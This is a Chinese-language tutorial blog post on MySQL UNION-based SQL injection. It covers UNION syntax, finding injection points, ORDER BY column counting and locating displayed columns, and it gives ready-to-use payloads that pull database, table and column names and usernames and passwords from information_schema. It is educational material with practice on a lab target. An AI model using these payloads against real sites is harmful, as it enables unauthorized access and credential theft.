sql注入中的联合注入

联合注入

联合注入顾名思义，就是使用联合查询进行注入的一种方式，是一种高效的注入的方式，适用于有回显同时数据库软件版本是5.0以上的MYSQL数据库。至于为什么需要版本是5.0以上的MYSQL数据库，是因为MYSQL会有一个系统数据库information_schema，能很快的通过几条注入语句获取到想要的数据。
 

使用条件

union有一个十分严格的约束条件，因为是联合查询，必选保证字段数一致，即两个查询结果有相同的列数，因此我们后面要对字段数进行判断。

UNION语法

mysql中，union用于将多个select语句的结果组合到一个结果集中，并删除结果集中的重复数据。

语法为：

select column,...from table1 union select column,...from table2;

实际用例： 

select Host from user union select User from user;

在kali中实际操作来加深理解一下，如何在kali中进入mysql可以看我的另一篇博客

kali普通用户获取root权限以及用kali进入mysql的学习笔记_ZredamanJ的博客-CSDN博客_kali给普通用户root权限

 在mysql数据库中查询所有的表

show tables;

查询user表中的字段

show columns from user;

这是使用select直接查询的方式

select Host from user;
select User from user;

使用union select 查询的方式

select Host from user union select User from user;

 可以看到union select将select语句的结果整合的一个结果集，并删除重复的数据。

联合注入的流程

联合注入的过程

1、判断注入点

2、判断是闭合形式

3、判断查询列数

4、判断显示位

5、获取所有数据库名

6、获取数据库所有表名

7、获取字段名 

8、获取字段中的数据

1、判断注入点

假如存在这么一个参数?id=1

 可以在参数后面加个单引号或者双引号看是否爆sql语法的错误

?id=1'

?id=1"

如爆sql语法的错误，则可判断存在sql注入，如果爆其它错误，也许是管理人员设的WAF，得根据其它测试来判断。

2、判断闭合闭合形式

推荐一篇别人判断闭合形式的总结，写得不错，我就不班门弄斧了。

SQL注入基础--判断闭合形式_小菜的博客-CSDN博客_sql注入闭合方式

在皮卡丘靶场对博客的总结进行一波实验 

一、找到数字型闭合形式的题，在bp抓包

在1后面加上单引号，发现报错

在1后面加上双引号，也发现报错

二、切换的字符型的题目尝试一下

在1后面加上单引号，发现报错

在1后面加双引号，没报错 

 到这大致可以证明那篇博客的准确性，如果觉得还不能确定，可以继续手动加上注释符试试。

3、判断查询列数

正常的查询列数的语句为

1' order by 1--+

1' order by 2--+

order by 1的含义是排序第一个栏位，order by 2排序第二个栏位。

当order by 3时排序第三个栏位回显正常，而order by 4回显错误，可以判断出当前sql语句向该表查询了三个字段。例如下面这个例子，web服务器向Users表中查询了user、passwd、id三个字段：

select user,passwd,id from Users

而实际上Users表可能有user、passwd、id、host、ip等字段，所以说order by只是判断了当前sql语句查询的字段数，并不是判断Users表中有几个列，目的是为了符合union的用法，即有相同的字段数。

 

重点：order by是对数据库中返回结果的排序，而不是对数据库的表里面列的排序。

 

4、判断回显位

判断方法

知道了列数我们还需要查询回显位，因为虽然知道了列数，但我们要sql注入返回信息到我们手中。

对于一个网页，如果它的列数有三列，但可能只有1，2列的数据返回页面前端。所以我们需要查询哪个列会回显，得用union select 1,2,3来查看回显位。

union select后面加数字串时，如果没有后面的表名，该语句没有向任何一个数据库查询，那么它输出的内容就是我们select后的数字（数字串不一定要1，2，3，也可以是随便的数字如1，342，3522）。

常用的判断回显位语句

-1' union select 1,2,3--+

原理剖析

正常情况下，如果存在与sql数据库交互的地方进行查询时，web服务器自动拼接一个select语句。

这时候攻击者可以构造payload来闭合，从而形成逃逸，可以任意执行sql语句，类似上面的payload。

上图中的是数字型注入，所以不用闭合，直接执行sql注入。

如果是字符型的，查询语句就是这样

Select * from Article where id='36' 

这个时候输入我们的payload，向数据库查询的语句则是

Select * from Article where id='-1' union select 1,2,3--+' 

恰好符合我们的union select的语法，完成查询。

这里一定得是-1 union......，而不是1 union.....因为程序在展示数据的时候通常只会取结果集的第一行数据，mysql_fetch_array只被调用了一次，而mysql_fetch_array从结果集中取得一行作为关联数组或数字数组或二者兼有，具体看第二个参数是什么。所以这里无论怎么折腾最后只会出来第一行的查询结果。

只要让第一行查询的结果是空集，即union左边的select子句查询结果为空，那么union右边的查询结果自然就成为了第一行，打印在网页上了

5、获取所有数据库名

懂了前面这些，后面的查库名之类的就很简单了，就固定语句而已。

以下的查询都以字符型为例，查询全部的数据库，group_concat是将查询出的结果整合到一起，带出所有数据。

-1' union select 1,group_concat(schema_name) from information_schema.schemata#

 查询当前使用的数据库

-1' union select 1,database()#

6、获取数据库所有表名

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

7、获取字段名 

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

8、获取字段中的数据

-1' union select username,password from users#

写在最后的话

有时候得#并不会起注释作用，得换成%23，具体原因是

#号在url上时并不等价与%23，因为浏览器会将url中的#看做一个页面标记符，定位你看到一个网页中的那一个部分了，所以并不会随着负载进入后端，也就起不来注释作用。

参考文章 

https://blog.csdn.net/weixin_42277564/article/details/80583959

sql注入之union联合注入_k1ling的博客-CSDN博客_union注入

mysql中union怎么使用 - MySQL数据库 - 亿速云 (yisu.com)

SQL ORDER BY 子句 (w3school.com.cn)